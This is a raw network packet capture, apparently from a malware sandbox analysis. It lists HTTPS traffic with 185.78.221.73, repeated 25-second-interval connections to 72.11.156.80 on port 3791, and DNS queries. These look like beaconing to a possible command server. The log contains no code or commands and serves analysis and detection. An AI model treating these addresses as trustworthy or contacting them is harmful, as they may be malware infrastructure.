                                                                      Nov 18, 2024 08:17:14.787359953 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.050854921 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.050888062 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.050896883 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.050995111 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.051055908 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.094511032 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.167243958 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.167254925 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.167352915 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.167414904 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.209775925 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.209788084 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.209866047 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.211026907 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.211035967 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.211116076 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.259416103 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.259426117 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.259515047 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.284123898 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.284240961 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.372056007 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.372193098 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.372673988 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.372792006 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.373631001 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.373713017 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.373811007 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.373881102 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.374708891 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.374780893 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.375960112 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.376051903 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.417740107 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.417855978 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.418127060 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.418231964 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.488728046 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.488821983 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.538754940 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.538836002 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.538954973 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539017916 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.539052010 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.539071083 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539098024 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539112091 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.539140940 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539161921 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539469004 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.539547920 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.539683104 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.539752007 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.540440083 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.540514946 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.540585041 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.540657997 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.541341066 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.541425943 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.541529894 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.541606903 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.544390917 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.544473886 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.544534922 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.544631958 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.548501968 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.548580885 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.586679935 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.586822033 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.587086916 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.587163925 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.587440968 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.587541103 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.587770939 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.587846041 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.588047028 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.588114977 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.605618000 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.605705023 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.688788891 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.688915968 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.689332962 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.689438105 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.690113068 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.690186024 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.690808058 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.690892935 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.691648960 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.691721916 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.693969011 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.694051027 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.694171906 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.694241047 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.694593906 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.694669962 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.694916964 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.694986105 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.695321083 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.695390940 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.695936918 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.696011066 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.696728945 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.696795940 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.697698116 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.697768927 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.699490070 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.699603081 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.699826956 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.699902058 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.700202942 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.700268984 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.700716972 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.700793028 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.700974941 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.701042891 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.701852083 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.701924086 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.702114105 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.702183008 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.703146935 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.703218937 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.703349113 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.703425884 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.703939915 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.704015017 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.715837955 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.724375963 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.745616913 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.745765924 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.747251987 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.747335911 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.747363091 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.747546911 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.747621059 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.747864962 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.747939110 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.748405933 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.748490095 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.748970985 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.749048948 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.805280924 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.805386066 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.806034088 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.806133986 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.807055950 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.807142019 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.807602882 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.807699919 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.808090925 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.808173895 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.808705091 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.808784962 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.848010063 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.848097086 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.848351002 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.848429918 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.849128962 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.849204063 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.859195948 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.859270096 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.860642910 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.860719919 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.860805035 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.860874891 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.861098051 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.861166954 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.861294031 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.861368895 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.861754894 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.861838102 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.862013102 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.862082958 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.862247944 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.862318039 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.862565994 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.862646103 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.862838030 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.862907887 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.862998962 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.863078117 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.863209963 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.863281012 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.863576889 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.863643885 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.863714933 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.863784075 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.863883018 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.863954067 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.864373922 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.864450932 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.864520073 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:15.864588022 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.867925882 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.868547916 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:15.873039961 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330065966 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330368042 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330446959 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330542088 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330612898 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.330868959 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.330964088 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331119061 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331196070 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331228971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331299067 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331329107 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331374884 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331398010 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331429005 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331458092 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331465960 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331521988 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.331540108 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.331621885 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.340900898 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341073036 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341121912 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341145039 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341169119 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341435909 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341454029 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341521025 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341653109 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341730118 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.341886997 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.341963053 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.342056036 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.342153072 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.349658012 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.349746943 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.390857935 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.390980005 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.391824007 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.391905069 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.392175913 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.392247915 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.392462015 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.392549992 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393403053 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393456936 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393495083 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393513918 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.393542051 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.393567085 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.432074070 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.432174921 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.432959080 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433072090 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.433708906 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433784008 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.433880091 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.433958054 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.443701982 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.443795919 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.443938971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.444015980 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.444258928 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.444331884 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.444987059 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445061922 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445070982 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445091963 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445120096 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445126057 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445151091 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445163965 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445183992 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445195913 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445235968 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445241928 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.445256948 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.445301056 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450417995 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450505972 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450524092 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450579882 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450650930 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450664997 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450828075 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.450890064 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.450902939 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451037884 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451112986 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451128006 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451209068 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451272964 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451286077 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451371908 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451440096 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451452971 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451836109 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451900005 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451905966 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451921940 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.451976061 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.451980114 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452016115 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452071905 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452075958 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452088118 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452147007 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452148914 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452161074 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452213049 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452218056 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452229977 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452281952 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452290058 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452301025 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452358007 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.452434063 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.452511072 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.460148096 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460227966 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.460243940 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460268021 CET44349734185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:16.460330963 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:16.464380026 CET49734443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:36.469657898 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:17:36.475205898 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:01.485296011 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:01.490317106 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:26.501065016 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:26.505974054 CET37914973172.11.156.80192.168.2.4
                                                                      Nov 18, 2024 08:18:51.516860962 CET497313791192.168.2.472.11.156.80
                                                                      Nov 18, 2024 08:18:51.521948099 CET37914973172.11.156.80192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 08:16:59.584736109 CET | 60898 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 08:16:59.828737974 CET | 53 | 60898 | 1.1.1.1 | 192.168.2.4
Nov 18, 2024 08:17:05.470633984 CET | 63667 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 08:17:05.751359940 CET | 53 | 63667 | 1.1.1.1 | 192.168.2.4
